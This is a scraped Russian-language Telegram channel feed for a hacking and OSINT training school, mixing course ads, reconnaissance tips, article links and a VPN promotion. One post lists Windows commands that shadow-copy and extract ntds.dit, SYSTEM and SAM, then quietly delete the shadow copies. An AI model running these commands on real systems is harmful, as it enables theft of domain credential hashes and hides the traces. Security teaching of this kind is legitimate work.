Пока ты внедрял EDR, хакеры научились его выключать за 3 секунды. Пока ты ставил MFA, Lazarus крал сессии через npm за $200. Пока ты запускал контейнеры, три CVE в runc открыли дверь к твоему кластеру.
Полное техническое вскрытие шести атак которые обнулили индустрию кибербезопасности в 2025/2026. С терминальными скринами и пошаговыми инструкциями.
На основе 38 докладов PHDays и 50+ реальных инцидентов.
📖 Часть 1: Supply Chain, MFA Bypass, Container Escape, EDR Kill
🔗 https://telegra.ph/Tehnicheskoe-vskrytie-shest-atak-kotorye-obnulili-industriyu-kiberbezopasnosti-04-05
📖 Часть 2: Hardware Hacking, Crypto Wars, AI, Заключение
🔗 https://telegra.ph/Tehnicheskoe-vskrytie-20252026-Hardware-Crypto-AI-Zaklyuchenie-CHast-2-04-05
@ruhack_school
Полное техническое вскрытие шести атак которые обнулили индустрию кибербезопасности в 2025/2026. С терминальными скринами и пошаговыми инструкциями.
На основе 38 докладов PHDays и 50+ реальных инцидентов.
📖 Часть 1: Supply Chain, MFA Bypass, Container Escape, EDR Kill
🔗 https://telegra.ph/Tehnicheskoe-vskrytie-shest-atak-kotorye-obnulili-industriyu-kiberbezopasnosti-04-05
📖 Часть 2: Hardware Hacking, Crypto Wars, AI, Заключение
🔗 https://telegra.ph/Tehnicheskoe-vskrytie-20252026-Hardware-Crypto-AI-Zaklyuchenie-CHast-2-04-05
@ruhack_school
🎯 ОХОТА НА ЗАБЫТЫЕ ПОДДОМЕНЫ
Самое слабое звено защиты — забытые ресурсы.
Часто это:
🔹 staging-версии сайтов
🔹 тестовые серверы
🔹 старые домены
🔹 dev-ресурсы
Их легко найти через DNS-записи.
⚡️ Инструменты вроде subfinder позволяют за минуты
собрать список всех ресурсов цели.
А дальше — поиск уязвимостей.
📢 Cyber Hack Academy
https://t.me/ruhack_school
Самое слабое звено защиты — забытые ресурсы.
Часто это:
🔹 staging-версии сайтов
🔹 тестовые серверы
🔹 старые домены
🔹 dev-ресурсы
Их легко найти через DNS-записи.
⚡️ Инструменты вроде subfinder позволяют за минуты
собрать список всех ресурсов цели.
А дальше — поиск уязвимостей.
📢 Cyber Hack Academy
https://t.me/ruhack_school
❤1👍1
Академия РуХак
⚡️ ОТКРЫТИЕ ПЕРВОГО ПОТОКА Запускаем набор на обучение по двум направлениям: 🕵️ OSINT и 💻 Пентест Практическая кибербезопасность. 📚 Что внутри: • поиск информации и анализ данных (OSINT) • разведка и поиск уязвимостей • работа с реальными инструментами…
Определись и ты!
Please open Telegram to view this post
VIEW IN TELEGRAM
@phantomnodegermanybot - наш собственный впн, для тех у кого перестал работать. Скорость отличная!👍
🔥3
Академия РуХак pinned «@phantomnodegermanybot - наш собственный впн, для тех у кого перестал работать. Скорость отличная!👍»
🧠 ТЕХНОЛОГИЧЕСКИЙ ОТПЕЧАТОК САЙТА
Каждый сайт оставляет цифровой след.
Определив стек технологий, можно понять:
🔹 CMS и фреймворки
🔹 Сервер и ОС
🔹 Версии библиотек
🔹 Используемые сервисы
⚡️ Инструменты:
🛠 WhatWeb
🛠 Wappalyzer
Они позволяют мгновенно определить технологии
и найти уязвимости под конкретные версии.
Знание технологий — первый шаг к поиску эксплойтов.
📢 Cyber Hack Academy
https://t.me/ruhack_school
Каждый сайт оставляет цифровой след.
Определив стек технологий, можно понять:
🔹 CMS и фреймворки
🔹 Сервер и ОС
🔹 Версии библиотек
🔹 Используемые сервисы
⚡️ Инструменты:
🛠 WhatWeb
🛠 Wappalyzer
Они позволяют мгновенно определить технологии
и найти уязвимости под конкретные версии.
Знание технологий — первый шаг к поиску эксплойтов.
📢 Cyber Hack Academy
https://t.me/ruhack_school
Направление: Дата-инжиниринг и квантизация моделей 💰 Условия:
💸 Вход в поток - 10 000 ₽
(140$)
💵 Занятие - 5 000 ₽ (70$)
Платишь только за те сессии, на которые приходишь.
⏱️ Формат:
онлайн • практика • лаборатории
🎓 После обучения : сертификат об окончании курсов ( не путать с повышением квалификации)
Количество мест ограничено.
📩 Запись:
@HKVD_A
@ruhack_school
💸 Вход в поток - 10 000 ₽
(140$)
💵 Занятие - 5 000 ₽ (70$)
Платишь только за те сессии, на которые приходишь.
⏱️ Формат:
онлайн • практика • лаборатории
🎓 После обучения : сертификат об окончании курсов ( не путать с повышением квалификации)
Количество мест ограничено.
📩 Запись:
@HKVD_A
@ruhack_school
❤4❤🔥1
На первом этапе инициируем создание снимка командой с указанием целевого тома.
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\NTDS\ntds.dit C:\temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\System32\config\SAM C:\temp\SAM
vssadmin delete shadows /for=C: /quiet
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤🔥1
⚡️ Вебинар в это воскресенье
🕵️ OSINT: как находят людей, инфраструктуру и скрытые связи в интернете
Разберём реальные методы, которые используют аналитики и специалисты по киберразведке.
На вебинаре:
• поиск по никнеймам и цифровому следу
• анализ соцсетей и утечек
• поиск по фото и геолокации
• инструменты OSINT-аналитиков
🗓 Воскресенье, 26 апреля
🕢 19:30 (МСК)
📍 Онлайн : Salute Jazz
Длительность: ~1-1.5 часа
Участие - Бесплатно ✅
@ruhack_school
🕵️ OSINT: как находят людей, инфраструктуру и скрытые связи в интернете
Разберём реальные методы, которые используют аналитики и специалисты по киберразведке.
На вебинаре:
• поиск по никнеймам и цифровому следу
• анализ соцсетей и утечек
• поиск по фото и геолокации
• инструменты OSINT-аналитиков
🗓 Воскресенье, 26 апреля
🕢 19:30 (МСК)
📍 Онлайн : Salute Jazz
Длительность: ~1-1.5 часа
Участие - Бесплатно ✅
@ruhack_school
🔥2